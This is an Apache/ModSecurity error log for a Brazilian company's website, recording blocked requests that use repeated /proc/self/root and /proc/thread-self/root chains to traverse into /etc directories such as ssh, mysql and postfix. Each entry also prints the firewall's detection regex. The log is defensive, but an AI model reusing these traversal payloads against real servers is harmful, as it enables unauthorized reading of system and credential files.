[Thu Mar 19 13:46:00.741025 2026] [:error] [pid 14269:tid 140411632822016] [client 74.7.241.31:51844] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoSAbLMZ6AikZjR9VzwQAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:46:05.491145 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.241.31:51846] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoTQbLMZ6AikZjR9VzxQAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:46:11.299298 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:40732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoU-oXxyEfFpUF8f8jCAAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:46:12.719131 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.241.31:54838] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoVMdf6f5d65gmYZSP7gAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:46:16.141812 2026] [proxy_fcgi:error] [pid 17887:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:59346] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:46:16.565942 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.243.128:51664] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoWAbLMZ6AikZjR9VzzQAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:46:18.203496 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.241.31:40220] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoWgkwaGbbGflqUZDfKwAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:46:20.684900 2026] [:error] [pid 27293:tid 140411741927168] [client 74.7.243.128:52934] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoXP-YZRR_7pZ7nDKhtAAAA8A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:46:25.066913 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:52950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoYcdf6f5d65gmYZSP9QAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:46:30.369303 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:60564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoZgkwaGbbGflqUZDfMgAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:46:34.585901 2026] [mime_magic:error] [pid 31803:tid 140411548894976] (70014)End of file found: [client 57.141.18.51:36894] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:46:37.591316 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:60568] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwobQkwaGbbGflqUZDfOQAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:46:39.665948 2026] [proxy_fcgi:error] [pid 19093:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:60018] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:46:43.313328 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:39566] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoc9a6ubjKNq_cu4ZtVQAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:46:48.211818 2026] [:error] [pid 14269:tid 140411557287680] [client 74.7.243.128:39576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoeAbLMZ6AikZjR9Vz4gAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:46:53.893773 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:40266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwofQkwaGbbGflqUZDfRQAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:47:00.355111 2026] [:error] [pid 19093:tid 140411741927168] [client 74.7.243.128:35750] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwohF_V7PWP6ixUYl7TVgAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:47:03.143797 2026] [proxy_fcgi:error] [pid 30077:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:60874] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:47:04.955309 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:40228] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoiNa6ubjKNq_cu4ZtZwAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:47:05.433686 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.228.61:50250] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwoieoXxyEfFpUF8f8jJAAAAUs"]
[Thu Mar 19 13:47:06.811935 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.243.128:35760] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwoisdf6f5d65gmYZSQDwAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:47:10.387455 2026] [:error] [pid 27293:tid 140411574073088] [client 74.7.241.31:41048] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwojv-YZRR_7pZ7nDKh3gAAA9Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:47:12.403691 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:58544] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwokAkwaGbbGflqUZDfUQAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:47:16.554218 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.241.31:41062] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwok_u8EFLIOrSqIpu-7gAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:47:17.566543 2026] [:error] [pid 27293:tid 140411616036608] [client 74.7.243.128:58546] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwolf-YZRR_7pZ7nDKh5QAAA88"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
